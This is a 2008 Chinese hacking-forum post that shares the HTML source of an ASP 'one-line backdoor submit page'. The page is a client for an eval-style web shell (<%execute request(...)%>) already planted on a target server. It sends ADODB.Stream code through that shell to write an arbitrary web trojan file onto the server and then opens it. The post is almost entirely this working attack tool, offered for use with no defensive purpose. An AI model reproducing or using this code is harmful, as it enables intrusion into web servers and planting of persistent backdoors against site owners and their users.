飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

查看: 2274|回复: 0

一句话后门提交页面Asp版

[复制链接]
  • TA的每日心情
    开心
    2024-6-9 16:20
  • 签到天数: 24 天

    [LV.4]偶尔看看III

    发表于 2008-6-4 19:57:49 | 显示全部楼层 |阅读模式
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    <title>一句话后门提交--无情迷恋</title>
    </head>
    <style>
    BODY {
            FONT-SIZE: 9pt;
            COLOR: #000000;
            FONT-FAMILY: "Courier New";
            scrollbar-face-color:#E4E4F3;
            scrollbar-highlight-color:#FFFFFF;
            scrollbar-3dlight-color:#E4E4F3;
            scrollbar-darkshadow-color:#9C9CD3;
            scrollbar-shadow-color:#E4E4F3;
            scrollbar-arrow-color:#4444B3;
            scrollbar-track-color:#EFEFEF;
    }
    TABLE {
            FONT-SIZE: 9pt;
            FONT-FAMILY: "Courier New";
            BORDER-COLLAPSE: collapse;
            border-top-width: 1px;
            border-right-width: 1px;
            border-bottom-width: 1px;
            border-left-width: 1px;
            border-top-style: solid;
            border-right-style: none;
            border-bottom-style: none;
            border-left-style: solid;
            border-top-color: #d8d8f0;
            border-right-color: #d8d8f4;
            border-bottom-color: #d8d8f0;
            border-left-color: #d8d8f0;


    }
    .tr {
            font-family: "Courier New";
            font-size: 9pt;
            background-color: #e4efff;
            text-align: center;
    }
    .td {
            font-family: "Courier New";
            font-size: 9pt;
            background-color: #f9f9fd;
    }
    .warningColor {
            font-family: "Courier New";
            font-size: 9pt;
            color: #ff0000;
    }
    input {
            font-family: "Courier New";
            BORDER-TOP-WIDTH: 1px;
            BORDER-LEFT-WIDTH: 1px;
            FONT-SIZE: 12px;
            BORDER-BOTTOM-WIDTH: 1px;
            BORDER-RIGHT-WIDTH: 1px;
            color: #000000;
    }
    textarea {
            font-family: "Courier New";
            BORDER-TOP-WIDTH: 1px;
            BORDER-LEFT-WIDTH: 1px;
            FONT-SIZE: 12px;
            BORDER-BOTTOM-WIDTH: 1px;
            BORDER-RIGHT-WIDTH: 1px;
            color: #000000;
    }
    A:visited {
            FONT-SIZE: 9pt;
            COLOR: #333333;
            FONT-FAMILY: "Courier New";
            TEXT-DECORATION: none;
    }
    A:active {
            FONT-SIZE: 9pt;
            COLOR: #3366cc;
            FONT-FAMILY: "Courier New";
            TEXT-DECORATION: none;
    }
    A:link {
            FONT-SIZE: 9pt;
            COLOR: #000000;
            FONT-FAMILY: "Courier New";
            TEXT-DECORATION: none;
    }
    A:hover {
            FONT-SIZE: 9pt;
            COLOR: #3366cc;
            FONT-FAMILY: "Courier New";
            TEXT-DECORATION: none;
    }tr {
            font-family: "Courier New";
            font-size: 9pt;
            line-height: 18px;
    }
    td {
            font-family: "Courier New";
            font-size: 9pt;
            border-top-width: 1px;
            border-right-width: 1px;
            border-bottom-width: 1px;
            border-left-width: 1px;
            border-top-style: none;
            border-right-style: solid;
            border-bottom-style: solid;
            border-left-style: none;
            border-top-color: #d8d8f0;
            border-right-color: #d8d8f0;
            border-bottom-color: #d8d8f0;
            border-left-color: #d8d8f0;
    }
    .trHead {
            font-family: "Courier New";
            font-size: 9pt;
            background-color: #e4e4f3;
            line-height: 3px;
    }
    .inputLogin {
            font-family: "Courier New";
            font-size: 9pt;
            border: 1px solid #d8d8f0;
            background-color: #f9f9fd;
            vertical-align: bottom;


    }
    .font-list {
            font-size: 9pt;
            color: CCCCFF;
            font-family: "Courier New";
    }
    </style>
    <body>
    <table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
    <form  method=post name="aoyunwan1">
        <tr>
          <td height="22" class="td"><center>一句话后门提交-无情迷恋</td>
        </tr>
        <tr>
          <td class="trHead">&nbsp;</td>
        </tr>
        <tr>
          <td height="18" class="td">&nbsp;表单提交地址:
            <input name="act" type="text" id="act" size="85" value="http://">
          </td>
        </tr>
        <tr>
          <td align="center" class="td">
    <textarea name=aoyunwan cols="80" rows="10">
    set iP=server.createObject("Adodb.Stream")
    iP.Open
    iP.Type=2
    iP.CharSet="gb2312"
    iP.writetext request("aoyun")
    iP.SaveToFile server.mappath("aoyunwan.asp"),2
    iP.Close
    set iP=nothing
    response.redirect "aoyunwan.asp"
    </textarea>
       <textarea name=aoyun cols="80" rows="10">添入生成木马的内容
    本提交页面所对应的服务端为 <%execute request("aoyunwan")%> ,可自行修改</textarea>
          </td>
        </tr>
        <tr>
          <td align="center" class="td">
       <input type="reset" name="Submit32" value="重 置">
       <input type="button" name="Submit4" value="提 示" onClick="alert('上面aoyunwan.asp为你的网马名\n下面的文本框放你的网马的代码\n');">
       <input type="submit" name="Submit3" value="提 交" onClick="javascript:aoyunwan1.action=document.all.act.value;">  
    </td>
        </tr>
        <tr>
          <td class="trHead">&nbsp;</td>
        </tr>
        <tr>
          <td height="22" align="right" class="td">程序修改: <a href="javascript:;" title="QQ:2931698
    http://www.aoyunwan.zj.com">无情迷恋</a> 2005.12&nbsp;</td>
        </tr>
      </form>
    </table>
    </body>
    </html>
    PYG19周年生日快乐!
    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表